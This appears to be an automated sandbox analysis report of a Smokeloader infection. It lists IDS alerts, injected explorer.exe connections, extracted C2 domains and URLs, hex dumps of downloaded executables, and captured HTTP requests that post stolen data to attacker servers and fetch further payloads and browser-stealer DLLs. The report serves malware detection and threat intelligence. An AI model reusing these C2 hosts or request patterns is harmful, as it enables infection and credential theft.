Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.8:53124 -> 190.147.128.172:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.8:53125 -> 190.147.128.172:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.8:53126 -> 190.147.128.172:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.8:53127 -> 190.147.128.172:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.8:53128 -> 190.147.128.172:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.8:53129 -> 190.147.128.172:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.8:53130 -> 190.147.128.172:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.8:53131 -> 190.147.128.172:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.8:53132 -> 190.147.128.172:80

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Network Connect: 109.175.29.39 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 190.13.174.94 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 91.202.233.231 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 23.145.40.124 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 190.147.128.172 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 45.129.96.86 80	Jump to behavior

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: boredimperissvieos.shop
Source: Malware configuration extractor	URLs: holicisticscrarws.shop
Source: Malware configuration extractor	URLs: sweetsquarediaslw.shop
Source: Malware configuration extractor	URLs: plaintediousidowsko.shop
Source: Malware configuration extractor	URLs: miniaturefinerninewjs.shop
Source: Malware configuration extractor	URLs: zippyfinickysofwps.shop
Source: Malware configuration extractor	URLs: obsceneclassyjuwks.shop
Source: Malware configuration extractor	URLs: acceptabledcooeprs.shop
Source: Malware configuration extractor	URLs: whispedwoodmoodsksl.shop
Source: Malware configuration extractor	URLs: https://steamcommunity.com/profiles/76561199689717899
Source: Malware configuration extractor	URLs: http://dbfhns.in/tmp/index.php
Source: Malware configuration extractor	URLs: http://guteyr.cc/tmp/index.php
Source: Malware configuration extractor	URLs: http://greendag.ru/tmp/index.php
Source: Malware configuration extractor	URLs: http://lobulraualov.in.net/tmp/index.php

Downloads executable code via HTTP

Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.22.1Date: Mon, 27 May 2024 13:23:34 GMTContent-Type: application/octet-streamContent-Length: 325120Last-Modified: Mon, 27 May 2024 13:20:02 GMTConnection: keep-aliveETag: "66548882-4f600"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 5b 37 b0 84 3a 59 e3 84 3a 59 e3 84 3a 59 e3 89 68 86 e3 98 3a 59 e3 89 68 b9 e3 09 3a 59 e3 89 68 b8 e3 aa 3a 59 e3 8d 42 ca e3 8d 3a 59 e3 84 3a 58 e3 e7 3a 59 e3 31 a4 bc e3 85 3a 59 e3 89 68 82 e3 85 3a 59 e3 31 a4 87 e3 85 3a 59 e3 52 69 63 68 84 3a 59 e3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 0e 81 f9 63 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 0c 00 00 0c 01 00 00 74 08 00 00 00 00 00 86 3d 00 00 00 10 00 00 00 20 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 90 09 00 00 04 00 00 70 bc 05 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 e4 83 01 00 64 00 00 00 00 e0 08 00 08 a8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 48 84 01 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 78 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 64 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 33 0b 01 00 00 10 00 00 00 0c 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 02 6c 00 00 00 20 01 00 00 6e 00 00 00 10 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 08 46 07 00 00 90 01 00 00 ce 02 00 00 7e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 08 a8 00 00 00 e0 08 00 00 aa 00 00 00 4c 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 27 May 2024 13:24:05 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 27 May 2024 13:22:08 GMTETag: "1e5000-6196f67744000"Accept-Ranges: bytesContent-Length: 1986560Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdos-programData Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 08 00 19 5e 42 2a 00 00 00 00 00 00 00 00 e0 00 8e 81 0b 01 02 19 00 40 07 00 00 0c 17 00 00 00 00 00 e0 4d 07 00 00 10 00 00 00 50 07 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 c0 1e 00 00 04 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 40 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 a0 07 00 84 21 00 00 00 90 08 00 00 26 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 07 00 74 96 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 07 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 43 4f 44 45 00 00 00 00 48 3e 07 00 00 10 00 00 00 40 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 44 41 54 41 00 00 00 00 44 29 00 00 00 50 07 00 00 2a 00 00 00 44 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 42 53 53 00 00 00 00 00 f9 11 00 00 00 80 07 00 00 00 00 00 00 6e 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 69 64 61 74 61 00 00 84 21 00 00 00 a0 07 00 00 22 00 00 00 6e 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 6c 73 00 00 00 00 14 00 00 00 00 d0 07 00 00 00 00 00 00 90 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 72 64 61 74 61 00 00 18 00 00 00 00 e0 07 00 00 02 00 00 00 90 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 2e 72 65 6c 6f 63 00 00 74 96 00 00 00 f0 07 00 00 98 00 00 00 92 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 2e 72 73 72 63 00 00 00 00 26 16 00 00 90 08 00 00 26 16 00 00 2a 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 1e 00 00 00 00 00 00 50 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

HTTP GET or POST without a user agent

Source: global traffic

HTTP traffic detected: GET /profiles/76561199689717899 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 23.145.40.124 23.145.40.124
Source: Joe Sandbox View	IP Address: 109.175.29.39 109.175.29.39

Internet Provider seen in connection with other malware

Source: Joe Sandbox View	ASN Name: SURFAIRWIRELESS-IN-01US SURFAIRWIRELESS-IN-01US
Source: Joe Sandbox View	ASN Name: TelmexColombiaSACO TelmexColombiaSACO
Source: Joe Sandbox View	ASN Name: BIHNETBIHNETAutonomusSystemBA BIHNETBIHNETAutonomusSystemBA
Source: Joe Sandbox View	ASN Name: AKAMAI-ASUS AKAMAI-ASUS

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View	JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Joe Sandbox View	JA3 fingerprint: 51c64c77e60f3980eea90869b68c58a8
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Uses a known web browser user agent for HTTP communication

Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: whispedwoodmoodsksl.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 74Host: whispedwoodmoodsksl.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12841Host: whispedwoodmoodsksl.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15070Host: whispedwoodmoodsksl.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20237Host: whispedwoodmoodsksl.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 5435Host: whispedwoodmoodsksl.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1206Host: whispedwoodmoodsksl.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 569527Host: whispedwoodmoodsksl.shop
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 37.27.34.12Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----GIEHIDHJDBFIIECAKECBUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 37.27.34.12Content-Length: 279Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----JJDBFCAEBFIJJKFHDAECUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 37.27.34.12Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----JDGIIJJDHDGCGDHIJDAKUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 37.27.34.12Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----GIIDBGDAFHJDHIDGDGIIUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 37.27.34.12Content-Length: 332Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----KJEGCFBGDHJJJJJKJECFUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 37.27.34.12Content-Length: 5329Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sqls.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 37.27.34.12Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----AECAKJJECAEGCBGDHDHCUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 37.27.34.12Content-Length: 829Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----HIDBFCBGDBKKECBFCGIEUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 37.27.34.12Content-Length: 437Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DAKFIDHDGIEGCAKFIIJKUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 37.27.34.12Content-Length: 437Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /freebl3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 37.27.34.12Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /mozglue.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 37.27.34.12Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /msvcp140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 37.27.34.12Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /nss3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 37.27.34.12Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /softokn3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 37.27.34.12Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /vcruntime140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 37.27.34.12Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----HIDAFHDHCBGDGCBGCGIIUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 37.27.34.12Content-Length: 1081Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----CBGCBGCAFIIECBFIDHIJUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 37.27.34.12Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----IJEHIDHDAKJDHJKEBFIEUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 37.27.34.12Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----FCBAEHCAEGDHJKFHJKFIUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 37.27.34.12Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----BFCAAEHJDBKJJKFHJEBKUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 37.27.34.12Content-Length: 453Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----BKFBAKFCBFHIJJJJDBFCUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 37.27.34.12Content-Length: 113601Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----KECFIDGCBFBAKEBFBKFBUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 37.27.34.12Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://spqqefesecvvfpt.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 286Host: dbfhns.in
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://dxgcikcstvjhw.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 141Host: dbfhns.in
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://deiljvysjqajyam.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 270Host: dbfhns.in
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://tgeabjhcrwocia.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 135Host: dbfhns.in
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://hfipxhiwprpsvl.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 163Host: dbfhns.in
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://mdyttvvsjifyxv.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 175Host: dbfhns.in
Source: global traffic	HTTP traffic detected: GET /file/update.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 45.129.96.86
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://faqldvcxoayalcyp.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 169Host: dbfhns.in
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://nspuoowkrfsuk.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 187Host: dbfhns.in
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://gcvwrsnytusejtdk.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 334Host: dbfhns.in
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://jebcasiwwjgorbsq.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 133Host: dbfhns.in
Source: global traffic	HTTP traffic detected: GET /pintxi1lv.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 23.145.40.124
Source: global traffic	HTTP traffic detected: GET /file/host_so.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.235.137.54
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://bshlmattfttfdb.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 269Host: dbfhns.in
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://bngikvknmtdpor.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 135Host: dbfhns.in
Source: global traffic	HTTP traffic detected: GET /sdf34ert3etgrthrthfghfghjfgh.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 91.202.233.231
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://amkihwobrgvem.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 340Host: dbfhns.in
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://bdtrshdmdsajiin.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 338Host: dbfhns.in
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://depvhlbmmte.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 357Host: dbfhns.in
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://barvntqgmwgcruw.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 358Host: dbfhns.in
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://cmmajutpfcykk.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 277Host: dbfhns.in
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://jrlquvadpwx.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 128Host: dbfhns.in
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://lmlmhdjgxcsr.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 228Host: dbfhns.in
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://dhyltqofxhpe.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 260Host: dbfhns.in
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://nxoumlltphj.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 196Host: dbfhns.in
